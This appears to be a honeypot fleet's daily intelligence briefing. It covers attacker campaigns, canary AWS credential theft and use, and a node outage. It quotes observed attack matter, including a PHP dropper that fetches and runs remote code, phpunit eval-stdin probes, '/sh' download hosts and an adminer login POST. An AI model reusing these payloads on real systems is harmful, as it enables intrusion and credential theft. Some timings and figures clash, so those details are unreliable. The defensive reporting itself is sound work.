FLUX FLEET — INTEL BRIEFING №24
Period: 2026-09-17 08:09 – 2026-09-18 08:09 UTC (24h, day 23 of operations)
Sources: 7 honeypot nodes (frantech-ts also runs non-flux ssh/telnet honeypots whose condensed feed lands in /data/hp-logs and is NOT part of this report) — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries)
Confidence: High (direct observation, 23-day baseline, every result-tag spike attributed by spot query)
BLUF
NIGHTAGENT executed its full kill chain against real infrastructure for the first time. 196.89.218.205 (Office National des Postes e-Tunisia AS — a NEW ASN for this fleet, not the Moroccan ONP family) ran the complete kit on ai-devbox-1 and canary-farm-1: phpunit webshell verification, the dropper with the unrotated GHSAT token, form login, and 4 mints. Minutes later a separate actor session began consuming the stolen AWS session token: 178.16.54.184 (Omegatech LTD, NL) ran ConsoleLogin, GetSigninToken, GetCallerIdentity, and 108 GetAccount plus 97 DescribeInstances denials across 8 use IPs — the fleet's first observed AWS console login and second credential-use event after №20's CREDENTIAL-DRAIN. Frantech-ts dropped 99% (76 events vs a 6,186 7-day average) because the node's root disk filled (100%, pcap archive at 49G): the flux writer died mid-record at 07:11 UTC Sep 17, healthchecks fail with no space left on device (FailingStreak 2,599), and the truncated JSONL tail crashed the digest until a repair. The AKAMAI-CONFIG cluster from №23 returned the next morning (200 events from 12 IPs, same /24) and added a fresh adminer POST (joomla_app + i88XB5hpLsQAzvz2f1AcHg).
Key Judgements
- NIGHTAGENT and CREDENTIAL-DRAIN operated as one pipeline in this window. 196.89.218.205 ran the NightAgent kit —
<?php echo "NightAgent";?>verification and thenightshelldropper with the same GHSAT token that has now survived 10 windows — then minted 4 credentials (2 aidev, 2 farm). 178.16.54.184 then logged into the AWS console within 13 minutes of the first mint: 6 credentials reached AWS, 24 calls (ConsoleLogin, GetSigninToken, GetCallerIdentity), 211 denials (GetAccount ×108, DescribeInstances ×97, ListUsers ×6). The mint IPs and the AWS use IP are different hosts in different ASNs — the same separation CREDENTIAL-DRAIN showed in №20. (High confidence — the use side is Tracebit alert evidence with per-operation detail; the kit body bytes match the registered NightAgent template.) - The frantech-ts outage is a disk-full failure, not a lull or an attack. The node's root filesystem is 100% full; /var/log/pcap holds 49G of tshark pcaps. The flux container's healthcheck has failed 2,599 consecutive times with
no space left on device. Flux logs stop at 09:19 UTC Sep 17 — a ~23-hour hole in the fleet's deception-only legacy node. The digest's −99% cell and the missing Sep 18 behavior feed are artifacts of this outage. (High confidence — observed on the node via SSH; container state and pcap directory listing both confirm.) - AKAMAI-CONFIG returned on schedule as a cluster, on a second node, with a rotated password. The 23.94.155.x /24 re-appeared on sponge-01-ts 06:20–06:26 UTC Sep 18 (200 events, 12 IPs). Leg separation repeats №23's shape: .31 (tarpit probes), .12 (phpMyAdmin 10-path enum — drove the sensor's 3.7× phpmyadmin-login spike), .14 (phpinfo/webshell sweep + 3 adminer POSTs with
joomla_app+ fresh 22-char passwordi88XB5hpLsQAzvz2f1AcHg), .24/.32 (wp-batch probes), .37 (config census). Same tooling, one day later, 0 mints. (High confidence — the adminer POST body shape and the /24 identity match the registered campaign; the password rotation follows the per-run pattern.) - Two fleet-wide tarpit sweeps carried the window's volume; both are census-class, not hostile. The fleet's tarpit-module traffic concentrated on two actors: 176.65.144.71 (Dedik Services, CH) ran 1,500 events in 9 seconds on farm with forged Googlebot/2.1 and 98 trap families (an OMEGA-SWEEP-template run, 10 mints) and 2a01:e0a:3be:cec0:f54c:335a:8d29:be (Free SAS FR, residential IPv6) burned 1,967 events in 7 minutes with 632 distinct paths (86 env-family hits, 8 mints). Both inflate the farm +32% cell; both mint, and the IPv6 actor is a first-ever residential-IPv6 source. (High confidence — per-IP spot queries; the Googlebot UA matches the standing OMEGA-SWEEP forgery, the IPv6 journey is the first from a French consumer ISP.)
Active Campaigns (day 23 status)
NIGHTAGENT / CREDENTIAL-DRAIN ⚠ AWS SESSION COMPROMISED (196.89.218.205 + 178.16.54.184)
- Actors: 196.89.218.205 — Office National des Postes e-Tunisia (new ASN for the fleet; same-name Moroccan ONP hosts NIGHTAGENT's prior operators, but this is a Tunisian AS). 178.16.54.184 — Omegatech LTD, NL (also appears in the kill-chain list as a separate kit operator; the AWS use side and the flux-side operator share the IP only as an actor name).
- TTPs: Full NightAgent chain on both EU nodes inside 45 minutes: phpunit
eval-stdin.phpprobes →<?php echo "NightAgent";?>verify → dropper POST<?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>→ wp-batch probes → fake-git walk → 4/.envmints → config-bundle and tomcat-bypass walks. Mint→use gap under 15 minutes: 6 credentials drew 24 successful calls (ConsoleLogin,GetSigninToken,GetCallerIdentity) and 211 denied operations (GetAccount×108,DescribeInstances×97,ListUsers×6) from 8 use IPs. - Assessment: The №20 CREDENTIAL-DRAIN pattern (separate mint and use infra) now runs with an authenticated console session — a step beyond №14 and №20's API-only use. The stolen session token leaks identity at most (
GetCallerIdentity-class successes), and the deny-all policy held, but this is the first ConsoleLogin/GetSigninToken success the fleet has captured. The GHSAT token is on its 11th window without rotation.
AKAMAI-CONFIG ⟳ SECOND CLUSTER RUN (23.94.155.0/24, sponge-01-ts)
- Actors: 12 IPs from the same /24 as №23 (23.94.155.11–.38, ColocCrossing/Latitude.sh US). All 12 returned within one 6-minute window (06:20–06:26 UTC Sep 18).
- TTPs: Per-leg IP separation held: .12 ran the 10-path phpMyAdmin enum (the sensor's entire 22-event phpmyadmin-login spike), .14 ran a 22-path phpinfo/webshell sweep plus 3 adminer credential POSTs (
auth[username]=joomla_app&auth[password]=i88XB5hpLsQAzvz2f1AcHg, URL-encoded form body on/adminer.php,/adminer/adminer.php,/admin/adminer.php), .37 swept 45 webshell/config paths, .24 and .32 sent wp-batch probes, .28 hit a webapp form login, .29 probed WHM. 0 mints. - Assessment: The cluster is a standing operator, not a one-off. It hit №23's sponge run once, and now repeats on the same node at the same hour-of-day with rotated passwords. Its credential POSTs aim at adminer, not at our traps — the fleet sees the reconnaissance only because the node surface overlaps.
OMEGA-SWEEP ⟳ TEMPLATE ESCALATION (176.65.144.71, farm + 94.154.46.244/.242/.246, Omegatech)
- Actors: 176.65.144.71 (Dedik Services Limited, CH) — a first-ever IP running the full OMEGA-SWEEP 743-path template with forged Googlebot/2.1: 1,500 events in 9 s, 98 trap families, 10 mints in one 9-second burst. The Omegatech /46 block returned on its standing cadence: .244 ran the 743-path core on aidev (1,285 events, 9 mints), .242 ran a 450-path subset (900 events, 2 mints), .246 ran a 150-path pass on sponge (150 events in 0.1 s, 0 mints).
- TTPs: Identical 743-path census with
/.envfanout and config-file families, Googlebot/2.1 forgery, sub-10-second full-template bursts. The template continues to escape its origin block — №15 marked the first escape, №24 adds a sixth operator IP outside the /46. - Assessment: The census tooling is now commodity with at least 7 operator IPs. Mints-per-run stays 1:1 with template runs; the /46's all-time hoard continues to grow without observed use until this window's session compromise.
LIBREDTAIL-KIT ⟳ TENTH WINDOW (12 IPs, phpunit RCE chain)
- Actors: 12 distinct IPs this window (390 phpunit-eval-stdin events). All fresh IPs; the honest
libredtail-httpUA background continues. - TTPs: Unchanged chain. 12 of 12 runs captured the dropper: 11 to
https://217.60.103.56/sh, 1 tohttps://217.60.195.113/shwith argapache.selfrep— the staging-host split from №17 reappears in miniature. 0 mints. - Assessment: The campaign's most consistent RCE prober. Body capture remains reliable; no staging-host change of significance.
MALWARE-DICT ⟳ Pfcloud loop (204.76.203.18, control + ru-edge)
- Actors: 204.76.203.18 (Pfcloud UG, NL), empty UA. 3,166 events in the window across control and ru-edge, 578 paths — the loop's wordlist is at 573 registered paths with the same
/bins/*arch fanout. - TTPs: Continuous GET dictionary. 6
observability-profiler-indexprobes (its only non-404 trap interaction). 0 mints. - Assessment: The 23-day continuous loop is now the fleet's longest-running hostile campaign. Volume matches the 7-day baseline; no wordlist growth detected this window.
REGISTRY-HUNT ⟳ (LeakIX) — 8 IPs, 8 mints
- Actors: 8 l9scan IPs (DigitalOcean), 328 events, 41 events per IP, UA variants unchanged (2.0.234313… farm, 2.0.632323… aidev).
- TTPs: The 12-step WebLogic→Confluence→WHM→Docker-registry walk, 1
/.envmint per IP (8 total). All 8 IPs are in the kill-chain table. - Assessment: Volume contracted from №23's 22-IP wave back to the №16 scale. The 1-mint-per-IP pattern is unchanged.
CREDSWEEP ⟳ RETURN (102.220.161.102, VPS Dedicated SI — 4 nodes, 4 mints)
- Actors: 102.220.161.102 — the №23 returnee — this window ran on ru-edge, control, farm, and aidev (1 mint each,
Go-http-client/1.1UA, 00:13–02:58 UTC). Sibling .87 and .139 are standing in the same /24. - TTPs: Short
.envcensus passes rather than the full 511-path run. 4 mints, 4 nodes in under 3 hours — the campaign's widest node spread to date. - Assessment: The VPS Dedicated /24's operator pool keeps rotating. The pacing shift (long census → quick passes on 4 nodes) suggests a scan-the-fleet phase.
INFOCREST-KIT ⟳ residual (41.249.4.249, ONP MA)
- Actors: 41.249.4.249 returned for 6 events only (no kit run this window).
- Assessment: The №23 operator checked in but did not re-run the kit. Sixth operator remains standing.
Standing actors (persistence check)
- 80.94.95.211 (SS-Net RO) — 12th window in 13: aidev 3 mints + ru-edge 3 mints (6 events each pass), MSIE-9 and Opera/Nokia UA forgeries. 14 all-time window mints, zero use.
- 213.209.159.175 (Feo Prest DE) — farm 3 + control 3 mints (77 events, 39 paths); sibling .154 ran netcup (247 events, 245 paths, Firefox/36.0 forgery, 1 mint on control) — the /24 is active on 3 nodes this window. 16 all-time window mints for .175.
- 94.154.46.x (Omegatech, OMEGA-SWEEP /46) — .244, .242, .246 all ran (see campaign section). Hoard continues to accumulate; the block's first AWS use is this window's session compromise.
- 176.65.148.71 — 2 events + 1 mint on farm (5:58 UTC). Fifth window in six for this single-purpose collector; 4 all-time mints.
- 69.5.20.14 (Byteplus, ALIYUN-PROBE) — 0 events. First idle window since its №22 naming; the on-schedule pattern is now broken once.
- 45.148.10.95 / 195.178.110.159 (Techoff git-walkers) — .159 ran 384 events/372 paths on aidev (2 mint rejections), unchanged from №23. The same-org pool rotation continues.
- WP-ENUM gen-2 (45.156.128.x) — 0 events this window. Second-generation cluster idle after three active windows.
- Absent: METADATA-HUNT (third idle), ENV-CENSUS-3/4, NIGHTAGENT-as-Moroccan-ONP (sixth idle — the Tunisian run is a new operator, not a return), XMLRPC-BRUTE (silent), CRUSADER-SWEEP (eighth idle), CURL-SWEEP (seventh miss), the frantech mega-dictionary hosts (23.234.119.20 and 138.199.6.195 both absent — no third replay).
Fleet Observations
- frantech-ts outage: root filesystem 100% full since ~07:11 UTC Sep 17. /var/log/pcap (tshark/Arkime pipeline) holds 49G on a 79G disk. Flux stopped writing mid-record; the digest crashed on the truncated JSONL line until repair. Node-side remediation (pcap pruning, container restart) is ops work outside this workflow's scope — the node is live but logging nothing.
- Digest repair: the truncated final record (a Censys GET
/from 199.45.155.25, chainId923f5d93) was dropped from medina's copy; the backup is.env-canary.jsonl.bak-truncfix-20260918. Loss is one redirect-chain hop event. The node-side source file is still truncated and will re-corrupt the next digest until the node recovers disk headroom. - Mint economics: 67 credentials minted to 23 collectors, 0 mint failures (the first zero-failure window since №16's). Fleet all-time issued rows: 984. Six credentials reached AWS from 178.16.54.184's theft; the deny-all policy held (24 successful calls, all identity-level).
- XFF forgery: the single-entry counter fired on 5 rows: 2 known deploy-verification probes (70.8.208.88,
/verify-forged//verify-chain), 2 from 179.43.134.114 (Private Layer CH — continued Cloudflare-XFF laundering on/trand/stories, 4 all-time), and 1 from the benign self-labeledmetabase-cve-2026-72898-detect/1.0(31.56.58.59, header-agrees-with-peer semantics, not a forgery). - Control velocity: 3,082 events / 124 unique IPs. Events sit 14% under the 7-day average while unique IPs keep climbing (42 → 124 over 5 days).
- Sponge +57%: driven by 213.177.179.52 (Feo Prest SRL, TW ASN — 1,128 events, WordPress enum + xmlrpc
wp.getUsers/getAuthorsPOSTs on 4 nodes in 3 hours) and 192.253.248.94 (Limited Network NL, same kit on farm+control, ipsum:2+firehol2 listed). The two IPs ran the identical 282-event pass minutes apart — a synchronized two-operator WordPress user-enumeration run.
Canary credentials
Summary
12 Tracebit alert(s) fired in the window (235 use events across 6 credentials). Fleet sensors minted 67 credentials to 23 collector IPs; 6 credential(s) reached AWS.
Use outcomes: 211 failure, 24 success.
Denied operations: GetAccount×108, DescribeInstances×97, ListUsers×6.
24 call(s) succeeded: ConsoleLogin, GetCallerIdentity, GetSigninToken. Successes leak identity at most; treat any success beyond sts:GetCallerIdentity as a finding.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 67 |
| Distinct collector IPs | 23 |
| Credentials used in AWS (alerts) | 6 |
| Credentials stolen, no observed AWS use in window | 61 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
176.65.144.71 |
canary-farm-1 | 10 | 0 | 0 | — | 10 mints since 2026-09-18 06:02 |
94.154.46.244 |
ai-devbox-1 | 9 | 0 | 0 | — | 9 mints since 2026-09-17 09:24 |
2a01:e0a:3be:cec0:f54c:335a:8d29:be |
canary-farm-1 | 8 | 0 | 0 | — | 8 mints since 2026-09-17 17:04 |
213.209.159.175 |
canary-farm-1 | 3 | 0 | 0 | — | 16 mints since 2026-09-11 23:01 |
213.209.159.175 |
control-1 | 3 | 0 | 0 | — | 16 mints since 2026-09-11 23:01 |
80.94.95.211 |
ai-devbox-1 | 3 | 0 | 0 | — | 14 mints since 2026-09-11 06:54 |
80.94.95.211 |
ru-edge-1 | 3 | 0 | 0 | — | 14 mints since 2026-09-11 06:54 |
178.16.54.184 |
ai-devbox-1 | 2 | 6 | 8 | ConsoleLogin, DescribeInstances, GetAccount, GetCallerIdentity, GetSigninToken, ListUsers | 4 mints since 2026-09-17 14:21 |
178.16.54.184 |
canary-farm-1 | 2 | 6 | 8 | ConsoleLogin, DescribeInstances, GetAccount, GetCallerIdentity, GetSigninToken, ListUsers | 4 mints since 2026-09-17 14:21 |
196.89.218.205 |
ai-devbox-1 | 2 | 0 | 0 | — | 4 mints since 2026-09-18 00:57 |
196.89.218.205 |
canary-farm-1 | 2 | 0 | 0 | — | 4 mints since 2026-09-18 00:57 |
94.154.46.242 |
ai-devbox-1 | 2 | 0 | 0 | — | 12 mints since 2026-09-15 15:58 |
102.220.161.102 |
ai-devbox-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-18 00:13 |
102.220.161.102 |
canary-farm-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-18 00:13 |
102.220.161.102 |
control-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-18 00:13 |
102.220.161.102 |
ru-edge-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-18 00:13 |
139.59.132.8 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 20:26 |
142.93.129.190 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 20:41 |
142.93.143.8 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 20:29 |
143.110.213.72 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-16 21:08 |
147.182.149.75 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 20:26 |
147.90.227.202 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 12:48 |
159.89.127.165 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 20:33 |
164.90.228.79 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 20:33 |
167.99.181.249 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-15 18:13 |
176.65.148.71 |
canary-farm-1 | 1 | 0 | 0 | — | 4 mints since 2026-09-11 11:39 |
209.99.185.69 |
ru-edge-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-18 03:26 |
213.209.159.154 |
control-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 20:33 |
47.129.9.164 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-17 10:37 |
57.154.242.54 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-16 14:23 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
None: 46 mints, 2026-09-12 08:14 → 2026-09-15 10:51136.117.52.210: 26 mints, 2026-09-14 00:41 → 2026-09-14 00:4134.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:44213.209.159.175: 16 mints, 2026-09-11 23:01 → 2026-09-18 02:3180.94.95.211: 14 mints, 2026-09-11 06:54 → 2026-09-18 02:2294.154.46.242: 12 mints, 2026-09-15 15:58 → 2026-09-17 08:5694.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:48176.65.144.71: 10 mints, 2026-09-18 06:02 → 2026-09-18 06:0294.154.46.243: 10 mints, 2026-09-15 20:50 → 2026-09-15 20:5094.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:1394.154.46.244: 9 mints, 2026-09-17 09:24 → 2026-09-17 09:24129.222.206.62: 8 mints, 2026-09-15 18:35 → 2026-09-15 21:402a01:e0a:3be:cec0:f54c:335a:8d29:be: 8 mints, 2026-09-17 17:04 → 2026-09-17 17:048.234.173.27: 7 mints, 2026-09-16 00:03 → 2026-09-16 00:0394.154.46.247: 6 mints, 2026-09-16 04:01 → 2026-09-16 04:0294.154.46.250: 5 mints, 2026-09-16 12:34 → 2026-09-16 12:34102.220.161.102: 4 mints, 2026-09-18 00:13 → 2026-09-18 02:58136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43167.99.79.44: 4 mints, 2026-09-11 18:18 → 2026-09-11 18:19176.65.148.71: 4 mints, 2026-09-11 11:39 → 2026-09-18 05:58196.89.218.205: 4 mints, 2026-09-18 00:57 → 2026-09-18 01:3969.5.20.14: 4 mints, 2026-09-16 09:23 → 2026-09-16 15:50159.89.12.166: 3 mints, 2026-09-11 20:20 → 2026-09-16 21:07167.99.181.249: 3 mints, 2026-09-15 18:13 → 2026-09-17 20:2341.249.4.249: 3 mints, 2026-09-17 03:54 → 2026-09-17 03:5564.226.65.160: 3 mints, 2026-09-15 20:17 → 2026-09-16 21:06
Gaps / Next Collection
- 178.16.54.184 AWS session: 6 credentials, 8 use IPs, 235 events — but the use IPs' full journeys are outside flux (expected; they never touched the traps). Pull the Tracebit alert logs for per-operation timestamps and check whether any use IP appears in flux logs all-time (the №20 precedent says no). If a second mint→use pair appears next window, promote the mint→use pattern from CREDENTIAL-DRAIN to standing campaign.
- frantech-ts disk: the node will keep failing until ops trims /var/log/pcap. Until then the ssh/telnet hp feed and the flux feed are both blind — treat all frantech numbers as floor values. After recovery, check the pcap rotation policy (49G on a 79G disk is a design problem, not a one-off).
- 23.94.155.x: two runs on sponge in two windows, zero mints, one adminer password per run. A third run with a mint would establish the cluster's credential-harvest intent against our canary surface; watch farm+aidev for the cluster's
.envfanout. - 196.89.218.205 (Tunisian ONP): one full kit run + 4 mints. If the Moroccan-ONP NIGHTAGENT family returns this window was coincidence; if the Tunisian IP re-runs, register it as a NIGHTAGENT operator expansion (different country, same kit, same unrotated GHSAT token).
- 179.43.134.114 laundering: 4 events over 2 days on sponge, 4 different forged Cloudflare XFFs, 3 distinct paths. The socket-peer pivot holds; watch for the peer appearing on other nodes.
Digest: /data/flux-logs/reports/flux-digest-2026-09-18.md
Briefing: /data/flux-logs/reports/flux-fleet-intel-briefing-2026-09-18.md
Watch next cycle: (1) 178.16.54.184's use IPs in Tracebit alerts — a second use event shows the drain pipeline is standing. (2) frantech-ts recovery after ops trims the pcap archive. (3) AKAMAI-CONFIG cluster third run — mints would promote it.